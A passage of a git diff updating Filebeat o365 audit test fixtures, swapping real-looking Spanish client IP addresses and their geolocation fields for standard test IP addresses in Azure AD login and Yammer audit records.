+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "forwarded"
         ],
@@ -5763,8 +5669,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:13:38.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -5782,7 +5688,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 83439,
+        "log.offset": 83337,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5799,10 +5705,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:38",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -5831,20 +5737,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -5862,8 +5766,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:05.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -5881,7 +5785,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 84890,
+        "log.offset": 84786,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5898,10 +5802,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:44:05",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -5930,20 +5834,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -5961,8 +5863,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:28:51.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -5980,7 +5882,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 86340,
+        "log.offset": 86232,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5997,10 +5899,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:28:51",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -6029,20 +5931,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -6060,8 +5960,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:25:21.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -6079,7 +5979,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 87732,
+        "log.offset": 87622,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6096,10 +5996,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:25:21",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -6128,20 +6028,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -6159,8 +6057,8 @@
     },
     {
         "@timestamp": "2020-02-12T21:38:20.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -6178,7 +6076,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 89182,
+        "log.offset": 89070,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6195,10 +6093,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T21:38:20",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -6227,20 +6125,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -6258,8 +6155,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:02.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -6277,7 +6174,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 90575,
+        "log.offset": 90463,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6294,10 +6191,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:44:02",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -6326,20 +6223,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -6357,8 +6252,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:03.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -6376,7 +6271,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 91967,
+        "log.offset": 91851,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6393,10 +6288,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:44:03",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -6425,20 +6320,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -6456,8 +6349,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:29:02.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -6475,7 +6368,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 93417,
+        "log.offset": 93297,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6492,10 +6385,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:29:02",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -6524,20 +6417,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -6555,8 +6446,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:25:21.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -6574,7 +6465,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 94867,
+        "log.offset": 94745,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6591,10 +6482,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:25:21",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -6623,20 +6514,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -6654,8 +6543,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:39.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -6673,7 +6562,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 96317,
+        "log.offset": 96193,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -6690,10 +6579,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:43:39",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -6722,20 +6611,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/o365/audit/test/22-yammer.log b/x-pack/filebeat/module/o365/audit/test/22-yammer.log
index 1c2fa3766b2b..08cad6005f49 100644
--- a/x-pack/filebeat/module/o365/audit/test/22-yammer.log
+++ b/x-pack/filebeat/module/o365/audit/test/22-yammer.log
@@ -1,2 +1,2 @@
-{"ObjectId":"Sales","Id":"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594","CreationTime":"2020-02-28T09:42:45","UserKey":"100320009d6edf94","YammerNetworkId":5846122497,"Operation":"GroupCreation","ClientIP":"79.159.10.151:12345","ActorYammerUserId":36787265537,"UserType":0,"ResultStatus":"TRUE","RecordType":22,"Workload":"Yammer","Version":1,"GroupName":"Sales","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","UserId":"alice@testsiem2.onmicrosoft.com","ActorUserId":"alice@testsiem2.onmicrosoft.com"}
+{"ObjectId":"Sales","Id":"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594","CreationTime":"2020-02-28T09:42:45","UserKey":"100320009d6edf94","YammerNetworkId":5846122497,"Operation":"GroupCreation","ClientIP":"216.160.83.57:12345","ActorYammerUserId":36787265537,"UserType":0,"ResultStatus":"TRUE","RecordType":22,"Workload":"Yammer","Version":1,"GroupName":"Sales","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","UserId":"alice@testsiem2.onmicrosoft.com","ActorUserId":"alice@testsiem2.onmicrosoft.com"}
 {"CreationTime":"2020-02-28T09:39:20","ActorUserId":"asr@testsiem2.onmicrosoft.com","ObjectId":"Company group","UserKey":"100320009d292e16","Id":"3f3e7f1c-84c1-55fc-9bb2-c8b8563eae06","ActorYammerUserId":36085768193,"ClientIP":"[fdfd::555]:12346","UserId":"asr@testsiem2.onmicrosoft.com","Operation":"GroupCreation","ResultStatus":"TRUE","UserType":0,"Workload":"Yammer","Version":1,"OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","YammerNetworkId":5846122497,"RecordType":22,"GroupName":"Company group"}
diff --git a/x-pack/filebeat/module/o365/audit/test/22-yammer.log-expected.json b/x-pack/filebeat/module/o365/audit/test/22-yammer.log-expected.json
index 9766954cc626..1521e2901399 100644
--- a/x-pack/filebeat/module/o365/audit/test/22-yammer.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/22-yammer.log-expected.json
@@ -1,8 +1,8 @@
 [
     {
         "@timestamp": "2020-02-28T09:42:45.000Z",
-        "client.address": "79.159.10.151:12345",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57:12345",
+        "client.ip": "216.160.83.57",
         "client.port": 12345,
         "event.action": "GroupCreation",
         "event.category": "iam",
@@ -25,7 +25,7 @@
         "network.type": "ipv4",
         "o365.audit.ActorUserId": "alice@testsiem2.onmicrosoft.com",
         "o365.audit.ActorYammerUserId": 36787265537,
-        "o365.audit.ClientIP": "79.159.10.151:12345",
+        "o365.audit.ClientIP": "216.160.83.57:12345",
         "o365.audit.CreationTime": "2020-02-28T09:42:45",
         "o365.audit.GroupName": "Sales",
         "o365.audit.Id": "2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594",
@@ -41,19 +41,18 @@
         "o365.audit.Workload": "Yammer",
         "o365.audit.YammerNetworkId": 5846122497,
         "organization.id": "0e1dddce-163e-4b0b-9e33-87ba56ac4655",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "source.port": 12345,
         "tags": [
             "forwarded"
diff --git a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log
index 525915630781..d612f1ccc9d7 100644
--- a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log
+++ b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log
@@ -1,49 +1,49 @@
 {"CreationTime":"2021-02-05T09:08:00","Id":"9b9e973b-64c3-4607-bc79-bf743c985051","Operation":"TeamCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":2,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","TeamName":"users"}
